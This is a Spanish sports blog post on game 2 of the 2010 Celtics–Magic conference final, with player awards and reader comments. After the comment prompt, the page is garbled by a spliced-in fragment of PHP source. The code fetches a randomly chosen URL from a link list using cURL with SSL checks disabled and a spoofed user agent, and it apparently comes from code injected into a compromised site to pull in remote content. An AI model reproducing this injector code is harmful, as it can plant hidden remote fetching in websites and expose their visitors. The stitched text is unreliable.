Playoffs 2009/2010: Doble golpe

19 de May de 2010 por TheDeerHunter

Segundo partido de la final de la conferencia Este y un 0-2 en el casillero. Tras unos plácidos playoffs para Orlando, los Celtics se sitúan de forma inesperada a dos partidos de su segunda final en tres años de la mano de dos hombres: Pierce y Rondo. Los dos tiros libres fallados por Vince Carter con el partido en el filo de la navaja nos transportan en el tiempo a aquellos dos de Nick Anderson en la final contra Houston o los del año pasado de Howard antes del fatídico triple de Fisher. Todo gira en torno a un número mágico para los Celtics y maldito para Orlando.

Se acabó definitivamente el favoritismo de Orlando en esta serie. Todo lo que sea alargar hasta el 7º sería, ahora mismo, una sorpresa mayúscula. Lo realista en este punto sería tratar de evitar la barrida, si esto es posible.
Podemos seguir con la venda en los ojos, insistir que están viejos, que Garnett es una sombra de lo que fue y se está arrastrando todas las series e ignorar ese tiro decisivo que le cae en las manos, finta a un lado, al otro y rubrica con un fade away perfecto con oposición de Howard, exterminando todas las esperanzas. La realidad es que con todo lo que está cayendo lo más probable es que de haber podido contar con este Garnett “acabado” la historia del año pasado hubiera cambiado. La realidad es que, sin ningún problema físico conocido, quien se arrastra es su par.

Y eso que anoche corregía Van Gundy sus “ocurrencias” y ciertas cosas volvían al sitio. Vince se aplicaba bien sobre Allen, Redick  o Gortat disfrutaban de minutos y el centro de todo volvía a ser Howard, encontrando el modo de romper la asfixiante presión que hay sobre sus poderosos hombros e incluso anotando sus tiros libres, que no es poco. Pero ahora es cuando aquello de “la plantilla más extensa y compensada” que hemos defendido algunos debe de valer para algo. El hecho es que tras el hundimiento de Lewis viene la incapacidad absoluta de Barnes o Pietrus a la hora de frenar a Pierce, no ya de producir por ellos mismos, o los problemas de Nelson o J-Williams frente a Rondo. Todo se derrumba como un castillo de naipes frente a la guerra de guerrillas que plantea Rivers. Cada punto de ventaja que adquieren los Celtics se convierte en una trinchera que hay que asaltar con el cuchillo entre los dientes. Y en esto no puede haber ahora mismo discusión. Los Celtics son los mejores de la liga.

PREMIOS

MVP: Yo daría el premio a unos Celtics que no hacen más que callar bocas pero si tenemos que personalizarlo lo haría en la pareja Rondo-Pierce, demasiado compromiso y hambre de victoria para los Magic.

Sorpresa: Ante las “ausencias” de gente importante como Nelson, Carter o Lewis, JJ Redick se convirtió en el lugarteniente de Dwight Howard y le apoyó con 16 puntos, 5 rebotes y 4 asistencias.

Decepción: El partido de Rashard Lewis tan solo puede ser catalogado como infame. ¿Han fichado los Celtics a un anti-Lewis durante el año?

Esfuerzo en vano: Situado de nuevo en la actividad ofensiva de Orlando, Dwight Howard se fue a los 30 puntos y 8 rebotes. De largo, el mejor de su equipo.

Y MAÑANA…

Último partido de las finales del Oeste antes que se trasladen a Phoenix. Oportunidad de ver una nueva exhibición de Kobe o de adivinar si Gentry ha encontrado alguna solución para pararlo. Si es que existe, claro…

Comenta

12 comentarios a esta entrada

  1. Maicas dice:
    #1

    Estos Celtics son luchadores a monton… nunca se rinden… se estan mereciendo el titulo claramente!
    espero otra final celtics-lakers y que se repita la misma historia de siempre.

    Animo Celtics!

      Citar

  2. HeiNeKeN dice:
    #2

    Madre mia, que decepcion me estoy llevando por parte de Orlando… a ver si logran el milagro de la remontada… pero esto esta jodido… y yo que me jugue dinero con un amigo a que Orlando barria a Boston xD

      Citar

  3. HeiNeKeN dice:
    #3

    Y que mala suerte tienen los Nets… y porque no decirlo… John Wall… porque los Wizards elegiran primeros en el Draft, seguidos de Sixers, Nets, Wolves y Kings.

      Citar

  4. Love Denise dice:
    #4

    Creo que la clave de los 2 partidos ha sido el horrible rendimiento de Lewis, cuyo rol, es vital en este equipo. Vuelvo a repetir lo mismo de hace un par de días, por qué no pones un rato a Bass o Anderson viendo como está Lewis.
    Los Celtics van 0-2, pero tampoco es que hayan hecho partidos titánicos, hoy han ganado con un inoperante Allen, y un Garnett mal en ataque. Esto habla sobre lo mal que ha jugado Orlando. Pierce está haciendo lo que le da la gana sin que nadie lo frene.
    Esto se ha puesto cuesta arriba, y lamentablemente es dificil ganar 4 partidos de 5, y tres de ellos fuera de casa. Oh no!! una final Lakers-Celtics es lo que menos qusiera ver personalmente

      Citar

  5. TheDeerHunter dice:
    #5

    Partidos titánicos en ataque… quizás podríamos decir que no (en cuanto a la aportación global de todos) pero en defensa lo han sido ambos.
    También es buen momento para retomar el debate de lo buen defensor que es Barnes (y Pietrus) en comparación a Artest. Aunque posiblemente será todavía mejor momento la final en caso de llegar Lakers para que no me acuséis de oportunista.

    De momento, el hecho es que de los tres defensores que he mencionado sólo uno de ellos ha ganado premios por tal motivo y ha llegado a ser all-star desde la defensa. Y por muy bueno que sé que es Pierce ahora mismo no es Durant ni soñando, aunque en esta serie lo parece. Para mí queda bastante demostrado que la comparación no se resiste… y para colmo los dos exteriores de Orlando están también manquísimos mirando aro.

    Reconozco que una final Lakers-Celtics me pone… pero viviría más tranquilo con una Lakers-Orlando (y no exactamente porque piense que Orlando sería un rival más fácil)

      Citar

  6. TheDeerHunter dice:
    #6

    Y dice Daimiel de Stan Van Gundy: “Es de los que tras todo el año yendo al trabajo por el mismo camino el día que lleva prisa busca un atajo y se equivoca”

    La metáfora está clavada XD … para desgracia de los aficionados de Orlando

      Citar

  7. Love Denise dice:
    #7

    con lo de partidos titanicos, me refería a que con un buen trabajo defensivo, y con Rondo y Pierce enchufados, les ha bastado para tumbar a Orlando, sin tener que recurrir a los recursos ofensivos de Allen y un Garnett a medio gas.
    Es dificil…pero todavía hay posibilidades.

    Wall y Arenas juntos?? no los veo yo muy compatibles, a no ser que el Agente Pistolitas cambie

      Citar

  8. Love Denise dice:
    #8

    Daimiel también decía que los Magic tenían el mejor coche y el mejor mantenimiento, y apostó claramente a que los Magic se zumbaban a los Celtics. Estos viejos zorros nos están callando la boca a todos, de hecho, creo que nadie en la porra puso a los verdes en la final.

      Citar

  9. TheDeerHunter dice:
    #9

    ni siquiera para la final de conferencia, Love

      Citar

  10. MagicJohnson32 dice:
    #10

    Hombre, es que la sorpresa fue que se cargaran a los Cavs ¿no? Quiero decir, que tuviesen el nivel (sobre todo físico). Ahora “simplemente” están manteniendo ese nivel.

    http://cache.deadspin.com/assets/images/deadspin/2008/06/Lakers-vs-Celtics.jpg

    xDD

      Citar

  11. sergio dice:
    #11

    Magnífico partido el de los verdes ayer. Como bien apunta Deer en el post, el principal problema que plantea el conseguir una victoria frente a los de Boston es la dificultad que entraña el limar cada punto de ventaja que pueden ir consiguiendo en el partido.

    Creo que las ventajas de Orlando en los partidos nunca han sido superiores a los 3 puntos (en el primero creo que no se pusieron por delante en todo el encuentro). La defensa exterior ayer rayó la perfección, con Allen, Rondo y Pierce (o cualquier suplente) muy intensos y en movimiento constante. Creo que no vi más de 5 o 6 tiros cómodo para los Magic. Eso tiene que frustrar a cualquiera.

    Aparte de que Van Gundy no esté consiguiendo alternativas para paliar el juego de los de Rivers, es que se hace más difícil extraerlos de la espiral de juego e intensidad en la que andan inmersos.

    Tienen jugadas muy mecanizadas, intentando buscar siempre al hombre libre. En los contraataques suelen dejar hacer a Rondo, auténtico especialista marcando los tiempos en las entradas a canasta y doblando balones a sus compañeros (Allen y Pierce siempre dispuestos en la línea exterior)

    Supongo que ahora puede resultar ventajista alabar todos los aspectos positivos que encontramos en Boston, pero me cuesta pensar que los de Florida puedan dar la vuelta a la situación. No tanto por el balance adverso de la eliminatoria como por el aspecto anímico en el que están envueltos. Además de que no tengo a Van Gundy como un gran motivador…

      Citar

  12. Love Denise dice:
    #12

    Finalmente, Howard no será sancionado por el hachazo a Pierce

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>